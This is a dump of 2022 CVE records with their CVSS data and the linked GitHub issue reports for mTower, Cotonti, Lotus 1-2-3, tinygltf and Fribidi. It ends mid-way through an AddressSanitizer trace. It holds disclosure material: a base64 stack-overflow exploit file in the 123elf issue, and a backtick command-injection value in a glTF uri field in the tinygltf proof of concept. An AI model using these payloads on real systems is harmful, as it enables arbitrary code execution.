[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/blob/18f4b592a8a973ce5972f4e2658ea0f6e3686284/tools/ecdsa_keygen.c#L135" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/issues/75" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.openssl.org/docs/manmaster/man3/EVP_CIPHER_CTX_new.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/blob/18f4b592a8a973ce5972f4e2658ea0f6e3686284/tools/ecdsa_keygen.c#L135" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/issues/75" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.openssl.org/docs/manmaster/man3/EVP_CIPHER_CTX_new.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:samsung:mtower:*:*:*:*:*:*:*:*", "matchCriteriaId": "8C72C53B-9CF2-4F9A-90C1-3A1FE236BA5B", "versionEndExcluding": null, "versionEndIncluding": "0.3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/Samsung/mTower/issues/75
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Samsung", "mTower" ]
# Affected components affected source code file: tools/ecdsa_keygen.c # Attack vector(s) Lacking a check for the return value of EVP_CIPHER_CTX_new. EVP_CIPHER_CTX_new() returns a pointer to a newly created EVP_CIPHER_CTX for success and NULL for failure. # Suggested description of the vulnerability for use in the CVE Null pointer dereference vulnerability in aes256_encrypt() function in Samsung Electronics mTower v0.3.0 (and earlier) due to a missing check on the return value of EVP_CIPHER_CTX_new. # Discoverer(s)/Credits UVScan # Reference(s) https://www.openssl.org/docs/manmaster/man3/EVP_CIPHER_CTX_new.html https://github.com/Samsung/mTower/blob/18f4b592a8a973ce5972f4e2658ea0f6e3686284/tools/ecdsa_keygen.c#L135
Security: NULL Pointer Dereference in the function aes256_encrypt()
https://api.github.com/repos/Samsung/mTower/issues/75/comments
1
2022-09-02T03:29:31Z
2022-09-05T20:21:41Z
https://github.com/Samsung/mTower/issues/75
1,359,661,025
75
4,090
CVE-2022-39839
2022-09-05T06:15:18.417
Cotonti Siena 0.9.20 allows admins to conduct stored XSS attacks via a forum post.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Technical Description" ], "url": "https://github.com/Cotonti/Cotonti/issues/1661" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Technical Description" ], "url": "https://github.com/Cotonti/Cotonti/issues/1661" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cotonti:cotonti_siena:0.9.20:*:*:*:*:*:*:*", "matchCriteriaId": "F3269E7D-8B8A-4991-A712-3F629FF84779", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Cotonti/Cotonti/issues/1661
[ "Exploit", "Issue Tracking", "Technical Description" ]
github.com
[ "Cotonti", "Cotonti" ]
Hello, we found the stored xss on forum. Tested on latest version 0.9.20. Poc: 1. Create new topic with poll ![Screenshot_1](https://user-images.githubusercontent.com/25474817/187523981-620df607-7984-4dc0-b880-9a3a5e32ef0a.png) 2. XSS execute ![Screenshot_2](https://user-images.githubusercontent.com/25474817/187524119-187c66ac-a772-43fb-aaf2-0730ed04c35b.png)
Stored XSS on forum
https://api.github.com/repos/Cotonti/Cotonti/issues/1661/comments
6
2022-08-30T19:16:21Z
2022-09-08T08:23:03Z
https://github.com/Cotonti/Cotonti/issues/1661
1,356,195,142
1,661
4,091
CVE-2022-39840
2022-09-05T06:15:18.707
Cotonti Siena 0.9.20 allows admins to conduct stored XSS attacks via a direct message (DM).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cotonti/Cotonti/issues/1660" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cotonti/Cotonti/issues/1660" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cotonti:cotonti_siena:0.9.20:*:*:*:*:*:*:*", "matchCriteriaId": "F3269E7D-8B8A-4991-A712-3F629FF84779", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Cotonti/Cotonti/issues/1660
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Cotonti", "Cotonti" ]
Hello, we found the stored xss. Tested on latest version 0.9.20. Poc: 1. Write a DM to any user ![Screenshot_1](https://user-images.githubusercontent.com/25474817/187519217-a0644e82-d8c2-41a4-926b-d52407528c6e.png) 2. Then read the incoming message and press "quote" to quote the message with payload. Press the button Response. ![Screenshot_2](https://user-images.githubusercontent.com/25474817/187519642-75cb9967-e14c-4cf0-9783-7087879184fe.png) 3. XSS execute ![Screenshot_3](https://user-images.githubusercontent.com/25474817/187519810-5dd9ccdd-98ed-4852-8e3f-497377b66a04.png)
Stored XSS
https://api.github.com/repos/Cotonti/Cotonti/issues/1660/comments
4
2022-08-30T18:58:49Z
2022-09-04T11:00:02Z
https://github.com/Cotonti/Cotonti/issues/1660
1,356,177,543
1,660
4,092
CVE-2022-39843
2022-09-05T07:15:08.207
123elf Lotus 1-2-3 before 1.0.0rc3 for Linux, and Lotus 1-2-3 R3 for UNIX and other platforms through 9.8.2, allow attackers to execute arbitrary code via a crafted worksheet. This occurs because of a stack-based buffer overflow in the cell format processing routines, as demonstrated by a certain function call from process_fmt() that can be reached via a w3r_format element in a wk3 document.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taviso/123elf/issues/103" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/taviso/123elf/releases/tag/v1.0.0rc3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taviso/123elf/issues/103" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/taviso/123elf/releases/tag/v1.0.0rc3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lotus_1-2-3_project:lotus_1-2-3:1.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "8E852959-16B3-469D-9F65-E614E6E25C8E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:lotus_1-2-3_project:lotus_1-2-3:1.0.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "D1B81F63-804E-46E6-8242-3D3B22DA07E4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "787" ]
787
https://github.com/taviso/123elf/issues/103
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "taviso", "123elf" ]
The unnamed function at 0x80bb148 is used to copy data into a buffer and lacks a destination length check. This function is called in two places - by `process_fmt()` and `fmt_cell_combine()`. The call by `process_fmt()` is reachable using a `w3r_format` element (0x13) in a wk3 file, where user-controlled data from the file is copied into a stack variable. The call by `fmt_cell_combine()` was not investigated. ``` ushort process_fmt(byte *buf,ushort buflen,ushort param_3) { [...] char local_404 [1024]; [...] uVar3 = FUN_080bb148(local_404,buf + 4,buflen - 4); dst src len ``` Both `buf` and `buflen` are controllable. The included exploit demonstrates this by overwriting the return address to point to a `jmp esp` gadget, where the payload causes the process to exit with a return value of 3 (I had originally intended to submit this to [BGGP3](https://tmpout.sh/bggp/3/), but missed the deadline!) A pull request will be provided containing a proposed fix. Base64 encoded exploit.wk3 - `AAAFAAAQBAAREwAVAAAAAAD+/v7+/zMzMzO8yhIIQM2AMw==` [edit: reduced exploit size from 38 to 34 bytes] This was discovered using [Ghidra](https://ghidra-sre.org/) and AFL++'s [QEMU mode](https://github.com/AFLplusplus/AFLplusplus/tree/stable/qemu_mode), and was inspired by [this tweet](https://twitter.com/taviso/status/1538275971660251136).
Exploitable Stack Overflow
https://api.github.com/repos/taviso/123elf/issues/103/comments
6
2022-09-04T00:40:42Z
2022-09-11T17:48:15Z
https://github.com/taviso/123elf/issues/103
1,360,997,448
103
4,093
CVE-2022-3008
2022-09-05T09:15:10.110
The tinygltf library uses the C library function wordexp() to perform file path expansion on untrusted paths that are provided from the input file. This function allows for command injection by using backticks. An attacker could craft an untrusted path input that would result in a path expansion. We recommend upgrading to 2.6.0 or past commit 52ff00a38447f06a17eab1caa2cf0730a119c751
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "cve-coordination@google.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve-coordination@google.com", "tags": [ "Exploit", "Issue Tracking", "Mailing List", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=49053" }, { "source": "cve-coordination@google.com", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/syoyo/tinygltf/blob/master/README.md" }, { "source": "cve-coordination@google.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/syoyo/tinygltf/commit/52ff00a38447f06a17eab1caa2cf0730a119c751" }, { "source": "cve-coordination@google.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/syoyo/tinygltf/issues/368" }, { "source": "cve-coordination@google.com", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5232" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Mailing List", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=49053" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/syoyo/tinygltf/blob/master/README.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/syoyo/tinygltf/commit/52ff00a38447f06a17eab1caa2cf0730a119c751" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/syoyo/tinygltf/issues/368" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5232" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tinygltf_project:tinygltf:*:*:*:*:*:*:*:*", "matchCriteriaId": "078C039E-D2B4-44A7-BEC7-7B77F794FB1D", "versionEndExcluding": "2.6.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "77" ]
77
https://github.com/syoyo/tinygltf/issues/368
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "syoyo", "tinygltf" ]
**Describe the issue** This is a security vulnerability. The `wordexp` call here allows arbitrary code execution https://github.com/syoyo/tinygltf/blob/0fa56e239c77cc864dc248842e8887d985cf8e3f/tiny_gltf.h#L2640 when parsing a gltf file. **To Reproduce** - OS: Linux - Compiler, compiler version, compile options: Clang 13.0.1-6 ```shell $ git clone https://github.com/syoyo/tinygltf $ cd tinygltf && make all $ echo '{"images":[{"uri":"a`echo iamhere > poc`"}], "asset":{"version":""}}' > payload.gltf $ ./loader_example payload.gltf $ cat poc iamhere ``` **Expected behaviour** The `echo iamhere > poc` command should not be executed and the `poc` file is not created in the CWD. **Additional context** This was found by OSS-Fuzz: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=49053 One potential fix here is to pass `WRDE_NOCMD` to `wordexp` per https://man7.org/linux/man-pages/man3/wordexp.3.html
Command injection via wordexp call.
https://api.github.com/repos/syoyo/tinygltf/issues/368/comments
6
2022-08-16T06:57:34Z
2022-09-05T23:23:45Z
https://github.com/syoyo/tinygltf/issues/368
1,339,900,556
368
4,094
CVE-2022-25308
2022-09-06T18:15:11.437
A stack-based buffer overflow flaw was found in the Fribidi package. This flaw allows an attacker to pass a specially crafted file to the Fribidi application, which leads to a possible memory leak or a denial of service.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2022-25308" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2047890" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/fribidi/fribidi/issues/181" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/fribidi/fribidi/pull/184" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2022-25308" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2047890" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/fribidi/fribidi/issues/181" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/fribidi/fribidi/pull/184" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:fribidi:*:*:*:*:*:*:*:*", "matchCriteriaId": "A9E50E4E-F644-4B2F-8972-60E055F52B68", "versionEndExcluding": "1.0.12", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "121" ]
121
https://github.com/fribidi/fribidi/issues/181
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "fribidi", "fribidi" ]
Hi, I found a bug, stack-buffer-overflow. - SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/lin/fribidi/bin/fribidi+0x5ab4) in main - Version ``` ➜ bin git:(master) ✗ ./fribidi --version fribidi (GNU FriBidi) 1.0.11 interface version 4, Unicode Character Database version 14.0.0, Configure options. Copyright (C) 2004 Sharif FarsiWeb, Inc. Copyright (C) 2001, 2002, 2004, 2005 Behdad Esfahbod Copyright (C) 1999, 2000, 2017, 2018, 2019 Dov Grobgeld GNU FriBidi comes with NO WARRANTY, to the extent permitted by law. You may redistribute copies of GNU FriBidi under the terms of the GNU Lesser General Public License. For more information about these matters, see the file named COPYING. Written by Behdad Esfahbod and Dov Grobgeld ``` At branch 859aa1b - Steps to reproduce ``` git clone https://github.com/fribidi/fribidi.git cd fribidi ./autogen.sh CFLAGS=-fsanitize=address ./configure --disable-shared make ./bin/fribidi ./poc ``` - Platform ``` ➜ bin git:(master) ✗ gcc --version gcc (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0 Copyright (C) 2017 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. ➜ bin git:(master) ✗ uname -r 5.4.0-91-generic ➜ bin git:(master) ✗ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 18.04.5 LTS Release: 18.04 Codename: bionic ``` - ASAN ``` ➜ bin git:(master) ✗ ./fribidi ~/id:000022,sig:06,src:000000,op:havoc,rep:128 ================================================================= ==8991==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffda2c0112f at pc 0x5580929d7ab5 bp 0x7ffda2bc1820 sp 0x7ffda2bc1810 READ of size 1 at 0x7ffda2c0112f thread T0 #0 0x5580929d7ab4 in main (/home/lin/fribidi/bin/fribidi+0x5ab4) #1 0x7fb0cce3dbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #2 0x5580929d6d29 in _start (/home/lin/fribidi/bin/fribidi+0x4d29) Address 0x7ffda2c0112f is located in stack of thread T0 at offset 260191 in frame #0 0x5580929d70d7 in main (/home/lin/fribidi/bin/fribidi+0x50d7) This frame has 5 object(s): [32, 36) 'option_index' [96, 100) 'base' [160, 260160) 'logical' [260192, 325192) 'S_' <== Memory access at offset 260191 underflows this variable [325248, 390248) 'outstring' HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/lin/fribidi/bin/fribidi+0x5ab4) in main Shadow bytes around the buggy address: 0x1000345781d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000345781e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000345781f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034578200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034578210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x100034578220: 00 00 f2 f2 f2[f2]00 00 00 00 00 00 00 00 00 00 0x100034578230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034578240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034578250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034578260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034578270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==8991==ABORTING ``` poc: [poc.zip](https://github.com/fribidi/fribidi/files/7761374/poc.zip) Thanks !!!
stack-buffer-overflow on address 0x7ffda2c0112f at pc 0x5580929d7ab5 bp 0x7ffda2bc1820 sp 0x7ffda2bc1810
https://api.github.com/repos/fribidi/fribidi/issues/181/comments
1
2021-12-22T09:03:41Z
2022-03-25T05:09:43Z
https://github.com/fribidi/fribidi/issues/181
1,086,605,471
181
4,095
CVE-2022-25309
2022-09-06T18:15:11.493
A heap-based buffer overflow flaw was found in the Fribidi package and affects the fribidi_cap_rtl_to_unicode() function of the fribidi-char-sets-cap-rtl.c file. This flaw allows an attacker to pass a specially crafted file to the Fribidi application with the '--caprtl' option, leading to a crash and causing a denial of service.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2022-25309" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2047896" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/fribidi/fribidi/commit/f22593b82b5d1668d1997dbccd10a9c31ffea3b3" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/fribidi/fribidi/issues/182" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2022-25309" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2047896" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/fribidi/fribidi/commit/f22593b82b5d1668d1997dbccd10a9c31ffea3b3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/fribidi/fribidi/issues/182" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:fribidi:*:*:*:*:*:*:*:*", "matchCriteriaId": "A9E50E4E-F644-4B2F-8972-60E055F52B68", "versionEndExcluding": "1.0.12", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "122" ]
122
https://github.com/fribidi/fribidi/issues/182
[ "Exploit", "Third Party Advisory" ]
github.com
[ "fribidi", "fribidi" ]
Hi, I found a bug, heap-buffer-overflow. - SUMMARY: SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/lin/fribidi/bin/fribidi+0x108fe) in fribidi_cap_rtl_to_unicode - Version ``` ➜ bin git:(master) ✗ ./fribidi --version fribidi (GNU FriBidi) 1.0.11 interface version 4, Unicode Character Database version 14.0.0, Configure options. Copyright (C) 2004 Sharif FarsiWeb, Inc. Copyright (C) 2001, 2002, 2004, 2005 Behdad Esfahbod Copyright (C) 1999, 2000, 2017, 2018, 2019 Dov Grobgeld GNU FriBidi comes with NO WARRANTY, to the extent permitted by law. You may redistribute copies of GNU FriBidi under the terms of the GNU Lesser General Public License. For more information about these matters, see the file named COPYING. Written by Behdad Esfahbod and Dov Grobgeld ``` At branch 859aa1b - Steps to reproduce ``` git clone https://github.com/fribidi/fribidi.git cd fribidi ./autogen.sh CFLAGS=-fsanitize=address ./configure --disable-shared make ./bin/fribidi --caprtl ./poc ``` - Platform ``` ➜ bin git:(master) ✗ gcc --version gcc (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0 Copyright (C) 2017 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. ➜ bin git:(master) ✗ uname -r 5.4.0-91-generic ➜ bin git:(master) ✗ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 18.04.5 LTS Release: 18.04 Codename: bionic ``` - ASAN ``` ➜ fribidi git:(master) ✗ ./bin/fribidi --caprtl ~/id:000145,sig:06,src:000565,op:havoc,rep:4 _f$ ================================================================= ==10552==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61500000007c at pc 0x559f116818ff bp 0x7fffb37d3150 sp 0x7fffb37d3140 READ of size 4 at 0x61500000007c thread T0 #0 0x559f116818fe in fribidi_cap_rtl_to_unicode (/home/lin/fribidi/bin/fribidi+0x108fe) #1 0x559f1168019e in fribidi_charset_to_unicode (/home/lin/fribidi/bin/fribidi+0xf19e) #2 0x559f11676b5e in main (/home/lin/fribidi/bin/fribidi+0x5b5e) #3 0x7f7d5fd4bbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #4 0x559f11675d29 in _start (/home/lin/fribidi/bin/fribidi+0x4d29) 0x61500000007c is located 4 bytes to the left of 512-byte region 